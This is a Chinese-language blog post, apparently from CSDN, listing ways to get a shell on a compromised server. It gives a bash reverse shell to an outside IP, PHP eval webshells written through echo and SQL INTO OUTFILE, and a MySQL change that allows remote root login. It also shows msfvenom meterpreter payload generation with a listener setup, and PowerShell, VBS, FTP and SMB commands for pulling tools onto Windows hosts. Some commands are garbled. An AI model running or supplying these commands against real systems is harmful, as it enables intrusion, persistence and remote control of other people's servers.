获得shell的几种姿势

最新推荐文章于 2022-06-01 20:33:26 发布
最新推荐文章于 2022-06-01 20:33:26 发布
阅读量982 收藏 4
点赞数 1
分类专栏: 安全 漏洞挖掘 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/tomyyyyyy/article/details/95789234
版权

windows提权

1.通过sqlmap连接mysql获取shell

(1)直接连接数据库

sqlmap.py -d “mysql://root:123456@127.0.0.1:3306/mysql”–os-shell

(2)通过选择32位或者64位操作系统,获取webshell,执行

bash -i >& /dev/tcp/192.168.1.3/80800>&1

(3)反弹到服务器192.168.1.3,在实际中192.168.1.3为外网独立IP。

(4)通过echo命令生成shell:

echo?php@eval($_POST['chopper']);?>/data/www/phpmyadmin/1.php

如果能够通过phpmyadmin管理数据库,则可以修改host为“%”并执行权限更新,下面命令可参考:

use mysql;

update userset host =%where user = ‘root’;

FLUSHPRIVILEGES ;

注意:如果数据库中有多个host连接,修改时可能会导致数据库连接出问题。

2.通过msf反弹

(1)使用msfvenom生成msf反弹的php脚本木马,默认端口为4444:

msfvenom -p php/meterpreter/reverse_tcpLHOST=192.168.1.3 -f raw > test.php

(2)在独立IP或者反弹服务器上运行msf依次执行以下命令:

msfconsole

use exploit/multi/handler

set payload php/meterpreter/reverse_tcp

set LHOST 192.168.1.3  //192.168.1.3为反弹监听服务器IP

show options

run 0 或者exploit

(3)上传并执行php文件

将test.php上传到192.168.1.2服务器上面,访问后即可获取msf反弹shell

http:// 192.168.1.2:8080/test.php

3.通过phpmyadmin管理界面查询生成webshll

select ‘<?php @eval($_POST[cmd]);?>INTOOUTFILE ‘D:/work/WWW/antian365.php’

我们在做渗透测试的时候会经常遇到存在命令执行的Windows服务器,而且不能上传shell,唯一的入口就是命令执行,这种情况下,我们需要向服务器上传一个大一点的工具,如何实现,这就是本文章主要的内容。

利用http协议下载文件

利用vbs下载

将下面的代码保存为test.vbs

[外链图片转存失败(img-3N352k8n-1563021023687)(http://www.myh0st.cn/usr/uploads/2017/11/1127642178.png)]

执行如下语句:

cscript test.vbs

利用powershell下载

将如下代码保存为test.ps1

$p = New-Object System.Net.WebClient$p.DownloadFile("http://domain/file" "C:\%homepath%\file")

执行.test.ps1

有的时候PowerShell的执行权限会被关闭,需要使用如下的语句打开。

powershell set-executionpolicy unrestricted

利用ftp协议下载文件

1 创建一个ftp服务器,或者使用公共的ftp服务器

2 将下面的代码保存为test.txt

ftp 127.0.0.1
username
password
get fileexit

3 执行下面的命令

ftp -s:test.txt

利用smb协议拷贝文件

1 在公网创建一个共享如:\111.111.111.111test$

2 命令行下执行net use \111.111.111.111test$ /u:test test

3 最后上传文件到共享,命令行下拷贝:copy \111.111.111.111test$test.exe c:\

利用echo直接写文件

使用nishang的powershell工具包对上传的文件进行处理,然后使用echo到文件中,最后再转为原始文件。

下载地址:https://github.com/samratashok/nishang

具体操作步骤:

1 将文件转为hex

PS > .\ExetoText.ps1 evil.exe evil.txt

2 将hex的值echo到文件中

3 将hex转为原始文件

PS > .\TexttoExe.ps1 evil.text evil.exe

总结

这几种方式的利用场景是在我们发现一个服务器存在命令执行,而且还是一台Windows,在不依赖其他工具的前提下,使用Windows自带的命令将我们需要的工具上传到服务器的姿势。以上的脚本文件都可以使用echo 的方式保存到服务器上,然后再利用这些姿势上传大一点的工具等文件。欢迎大家补充各种姿势。

tomyyyyy
关注
  • 1
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
不进后台拿shell的一种方法
08-12
不进后台拿shell的一种方法.zip.不进后台拿shell的一种方法.zip
shell的一些方式
zdy8023的博客
04-06 6867
管理权限拿shell 需要有管理员权限才可以拿shell 如织梦cms 数据库备份拿shell 网站对上传的文件后缀进行过滤,不允许上传脚本类型文件如asp/php/jsp/aspx等 但是网站具有备份数据库备份功能,这时我们可以将webshell格式先将改为可允许上传的文件格式如jpg gif等 然后,我们找到上传后的文件路径,通过数据库备份,将文件备份为脚本格式 如动力文章 阉...
获取完美shell
em.....
06-01 668
微信公众号:小惜渗透,欢迎大佬一起交流进步 下面我将边演示边来介绍几种提升shell的方法,我这里面用的Linux虚拟机搭的DVWA靶场上传文件(吐槽一下,在windows上用小皮面板搭建一点问题没有,在Linux上可能因为权限的问题,文件上传那块正常的图片就死活传不上去,后来自己一顿调,本来都想放弃了,结果瞎调调好了)首先我这里用哥斯拉打开命令界面这时候可以通过方向上键回历史记录,但是一些需要交互的命令,如su或者vim都会执行失败,那么我们首先想到的肯定是反弹shell(反弹shell的命令大全,我公众
一些拿shell技巧
weixin_34087307的博客
11-01 135
1.直接上传asp asa jsp cer php aspx htr cdx 格式的***,不行就加个空格或是利用IIS6.0解析漏洞,常见格式:1.asp;1.jpg 或 1.asp;.jpg 或 1.asp;jpg2.有时上传图片格式的***,居然被程序检测拦截了,右键记事本打开***,在代码最前面加上gif89a,再数据库备份备份成asp格式的***拿下shell。3....
Shell中整数计算的几种方式
09-15
今天小编就为大家分享一篇关于Shell中整数计算的几种方式,小编觉得内容挺不错的,现在分享给大家,具有很好的参考价值,需要的朋友一起跟随小编来看看吧
详解NC反弹shell的几种方法
01-08
最终是将ubuntu、CentOS的shell反弹到kali上 正向反弹shell ubuntu或者CentOS上面输入 nc -lvp 7777 -e /bin/bash kali上输入 nc ip 7777 正向反弹是目标机先执行nc命令,然后kali上再进行nc监听,即可反弹shell...
Shell中字符串排序的几种方法
09-15
今天小编就为大家分享一篇关于Shell中字符串排序的几种方法,小编觉得内容挺不错的,现在分享给大家,具有很好的参考价值,需要的朋友一起跟随小编来看看吧
Shell脚本去重的几种方法实例
01-10
测试文件 代码如下: [root@bogon ~]# cat >test jason jason jason fffff jason 按 Ctr + D保存 1、sort -u 代码如下: [root@bogon ~]# sort -u test fffff jason 2、uniq 代码如下: [root@bogon ~]# uniq ...jason
45种可拿SHELL的方法
11-20
45种可拿SHELL的方法 free now~~~~~~~~~~~~~~~~~~~~~~~
教你如何拿下webshell
11-03
教你拿取webshell的45种方法,手动通过google hack技术及各种相应工具,让你找到上传点等其他很多漏洞上传木马拿到shell
获取webshell的方法
gugonggugong的博客
01-16 726
一、管理员权限进后台 正常上传:网站对上传文件的后缀并未过滤,直接上传 数据库备份与恢复:网站对上传的文件后缀有过滤,但网站有数据库备份的功能,可以将WebShell格式先改为允许上传的文件格式,然后,我们找到上传后的文件路径,通过数据库备份,将文件备份为脚本格式。 数据库配置文件插码:往配置文件中写入木马 各种绕过姿势:00%截断;特殊后缀文件名绕过;文件名大小绕过 利用解析漏洞:利用低版本的中间件apache、ng...
Linux获得shell的方法大全
weixin_45441727的博客
03-15 1318
上传webshell 生成webshell msfvenom -p php/meterpreter/reverse_tcp lhost=kail的IP lport=监听端口 -f raw > /root/Desktop/shell.php 使用burpsuite将shell.php上传(上面jpg改格式的都会吧) 反弹shell1 制作监听脚本PHP msfvenom -p php/meterpreter/reverse_tcp lhost=kail的IP lport=监听端口 -f raw 然后
获取Shell后的操作
墨鱼菜鸡
06-21 911
对于Windows系统主机和Linux系统主机,获取Shell后的操作都不同。 Windows 当我们通过对Web服务器进行渗透,拿到了该Web服务器的shell后,可以执行系统命令后,我们该如何操作呢? 第一步,先whoami 查看用户身份,如果是系统用户那就再好不过了,如果是普通用户的话,就得...
shell程序执行方式(三种方式)
热门推荐
zhuo的博客
03-28 1万+
实验假设有一个脚本script.sh 使用BASH shell脚本内容#!/bin/bashname='Tim'echo 'finished'这个脚本创建了一个name变量,并给这个变量赋了一个值。等会我们将执行这个命令,执行完成之后我们试着单独echo这个变量,看看会有什么不同的结果。1.使用./script.sh2.使用bash script.sh 或者sh script.sh3.使用. sc...
获取shell执行结果,不创建实际文件
孤独小剑的专栏
09-06 1148
popen使用FIFO管道执行外部程序。 #include FILE *popen(const char *command, const char *type); int pclose(FILE *stream); popen 通过type是r还是w确定comm
栈溢出攻击1——注入shellcode指令拿到shell
学习记录
09-15 2025
  在IDA的Function name这一栏里面,如下图所示,没有发现后门函数,说明这道题目需要自己写shellcode来拿到shell权限。 查看sub_80484E9函数的伪代码,如下所示。 int sub_80484E9() { char v1; // [esp+0h] [ebp-28h] puts("Could I know your name?"); myRead((int)&unk_804A060, 32); printf("Hi, %s.\n", &unk
拿到shell之后干什么_从Shell到提权一条龙
weixin_39574050的博客
11-24 2340
声明:The3ight原创文章,转载请声明出处!文中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途以及盈利等目的,否则后果自行承担!在一次渗透中,拿到域名WWW.*****.COM,访问网站,发现疑似注入点http://www.*****.com/ProductDetails.aspx?id=40,放入SqlMap,无果。查找后台,手动输入/admin...
45种可以拿到Webshell的程序
weixin_30274627的博客
06-06 1176
1,到GoogLe,搜索一些关键字,edit.asp? 韩国肉鸡为多,多数为MSSQL数据库!2,到Google ,site:cq.cn inurl:asp3,利用挖掘鸡和一个ASP木马.文件名是login.asp路径组是/manage/关键词是went.asp用'or'='or'来登陆4,关键字:Co Net MIB Ver 1.0网站后台管理系统帐号密码为 'or'='or'5.动感购物系统i...
shell变量类型有哪几种
最新发布
06-28
shell中,变量类型主要有以下几种: 1. 字符串变量:用于存储字符串类型的数据,如文本、数字等。 2. 数组变量:用于存储多个值的变量,可以通过下标访问数组中的元素。 3. 环境变量:用于存储系统环境信息的...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值